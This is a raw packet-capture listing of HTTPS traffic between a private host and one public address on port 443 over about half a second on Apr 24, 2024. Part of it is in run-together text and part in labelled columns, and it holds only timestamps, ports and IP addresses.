                                                                            Apr 24, 2024 10:12:29.689438105 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:29.689513922 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:29.689519882 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:29.689572096 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:29.689585924 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:29.689630985 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:29.722888947 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:29.722986937 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:29.723000050 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:29.723041058 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:29.728576899 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:29.728677034 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:29.728688955 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:29.728733063 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:29.740343094 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:29.740524054 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:29.740534067 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:29.740597963 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:29.750221014 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:29.750293016 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:29.750310898 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:29.750456095 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:29.760854959 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:29.760921001 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:29.760926008 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:29.761077881 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:29.772008896 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:29.772074938 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:29.772092104 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:29.772154093 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:29.772191048 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:29.772236109 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:29.780442953 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:29.780514002 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:29.780534029 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:29.780582905 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:29.793740988 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:29.793809891 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:29.793819904 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:29.793987989 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:29.798952103 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:29.799020052 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:29.799031019 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:29.799074888 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:29.808640003 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:29.808711052 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:29.808760881 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:29.808810949 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:29.818315029 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:29.818376064 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:29.820974112 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:29.821038008 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:29.821050882 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:29.821105957 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:29.830271959 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:29.830337048 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:29.830353022 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:29.830399990 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:29.830427885 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:29.830470085 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:29.839833021 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:29.839895964 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:29.839922905 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:29.839966059 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:29.847740889 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:29.847800016 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:29.847805977 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:29.847965002 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:29.855211973 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:29.855271101 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:29.855309963 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:29.855362892 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:29.871726036 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:29.871787071 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:29.871792078 CEST44349738142.251.2.132192.168.2.4
Timestamp                             Source Port  Dest Port  Source IP      Dest IP
Apr 24, 2024 10:12:29.871956110 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.874371052 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.874429941 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.874438047 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.874476910 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.878694057 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.878755093 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.878760099 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.878808022 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.885771990 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.885822058 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.885833025 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.885873079 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.885876894 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.885912895 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.893909931 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.893970966 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.893976927 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.894020081 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.900084972 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.900144100 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.901132107 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.901185036 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.907221079 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.907269001 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.907274008 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.907314062 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.916313887 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.916377068 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.922662973 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.922723055 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.922728062 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.922766924 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.927238941 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.927298069 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.927303076 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.927342892 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.928090096 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.928142071 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.928147078 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.928186893 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.930615902 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.930670023 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.930675983 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.930715084 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.936115026 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.936177969 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.936183929 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.936224937 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.941493988 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.941551924 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.942255020 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.942306995 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.944371939 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.944422960 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.944432020 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.944472075 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.948662043 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.948724031 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.948728085 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.948767900 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.954301119 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.954366922 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.954375029 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.954417944 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.957688093 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.957752943 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.957762003 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.957803011 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.963907957 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.963970900 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.964072943 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.964113951 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.968137980 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.968199015 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.968206882 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.968249083 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.971555948 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.971616030 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.973663092 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.973716974 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.973725080 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.973768950 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.980403900 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.980475903 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.980484009 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.980529070 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.983113050 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.983176947 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.983254910 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.983300924 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.988993883 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.989053965 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.989069939 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.989125967 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.990870953 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.990936041 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.990942955 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.990983963 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.996016979 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.996083975 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.996093988 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.996143103 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.999327898 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.999433994 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:29.999443054 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:29.999485970 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.004230022 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.004313946 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.004326105 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.004373074 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.008285046 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.008356094 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.008371115 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.008418083 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.011594057 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.011658907 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.011667013 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.011708021 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.011714935 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.011755943 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.015969038 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.016021013 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.016028881 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.016072989 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.019460917 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.019519091 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.019526958 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.019567966 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.023365974 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.023422956 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.025587082 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.025640965 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.025649071 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.025686979 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.029336929 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.029390097 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.029397964 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.029438019 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.033202887 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.033269882 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.033277988 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.033318996 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.036962032 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.037025928 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.037034988 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.037074089 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.040859938 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.040920973 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.040929079 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.040972948 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.044572115 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.044632912 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.044641018 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.044683933 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.048439980 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.048496008 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.048507929 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.048549891 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.052493095 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.052552938 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.052561998 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.052603006 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.055912018 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.055969954 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.055978060 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.056019068 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.059672117 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.059731007 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.059739113 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.059782982 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.063275099 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.063338995 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.063348055 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.063393116 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.066776037 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.066839933 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.066850901 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.066895962 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.070436001 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.070496082 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.072082996 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.072138071 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.072282076 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.072344065 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.075476885 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.075536013 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.075546026 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.075589895 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.078933001 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.079006910 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.079019070 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.079062939 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.082299948 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.082364082 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.082372904 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.082413912 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.085767031 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.085829020 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.085838079 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.085877895 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.089097977 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.089163065 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.089173079 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.089215994 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.092478991 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.092542887 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.092552900 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.092600107 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.097354889 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.097428083 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.097440004 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.097493887 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.099097967 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.099157095 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.099165916 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.099210024 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.102350950 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.102416992 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.102427959 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.102473021 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.105684996 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.105756044 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.105766058 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.105808973 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.105815887 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.105854988 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.108671904 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.108733892 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.108743906 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.108784914 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.111720085 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.111780882 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.113109112 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.113167048 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.113173962 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.113212109 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.115988016 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.116045952 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.116058111 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.116102934 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.118725061 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.118786097 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.118792057 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.118838072 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.122476101 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.122536898 CEST  49738        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:30.122545004 CEST  443          49738      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:30.122586012 CEST  49738        443        192.168.2.4    142.251.2.132
                                                                            Apr 24, 2024 10:12:30.124125957 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:30.124185085 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:30.124191046 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:30.124232054 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:30.126785994 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:30.126847982 CEST49738443192.168.2.4142.251.2.132
